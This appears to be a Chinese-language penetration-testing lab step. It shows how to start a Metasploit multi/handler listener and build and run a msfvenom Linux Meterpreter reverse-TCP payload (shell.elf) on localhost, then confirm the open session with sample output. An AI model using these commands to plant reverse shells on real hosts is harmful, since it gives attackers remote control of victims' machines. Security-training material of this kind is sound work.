拥有一个活动的 Meterpreter 会话
在此步骤中,你将在 Metasploit 中设置一个监听器,然后执行一个 payload 来模拟一个被攻陷的主机回连,从而创建一个活动的 Meterpreter 会话。此会话是运行任何后渗透模块的前提条件。
首先,让我们启动 Metasploit Framework 控制台。打开一个终端并输入:
msfconsole -q
-q 标志使启动横幅(banner)保持静默。一旦你进入 msf6 > 提示符,我们将配置一个监听器。我们将使用一个通用的 handler 和一个 Linux Meterpreter payload。
在 msfconsole 提示符下输入以下命令:
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 127.0.0.1
现在,使用 exploit -j 将监听器作为后台作业运行:
exploit -j
你应该会看到一个确认信息,表明 handler 已启动。
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
现在,打开一个新终端(你可以使用终端标签栏中的 + 按钮)。在这个新终端中,我们将生成并运行连接回我们监听器的 payload。我们将使用 msfvenom 来创建一个 Linux 可执行文件。
在第二个终端中,执行此命令来创建 payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/shell.elf
此命令将在你的 ~/project 目录中创建一个名为 shell.elf 的 ELF(Executable and Linkable Format)文件。
接下来,使文件可执行:
chmod +x ~/project/shell.elf
最后,运行 payload 以建立会话:
./shell.elf
现在,切换回你的第一个终端(即带有 msfconsole 的那个)。你应该会看到一条消息,表明已创建了一个新会话。
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38978) at 2023-10-27 10:30:00 -0400
为了确认,你可以使用 sessions 命令列出所有活动的会话。
sessions
你将看到列出的活动会话,这意味着你已准备好进行下一步。
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux 127.0.0.1:4444 -> 127.0.0.1:38978 (127.0.0.1)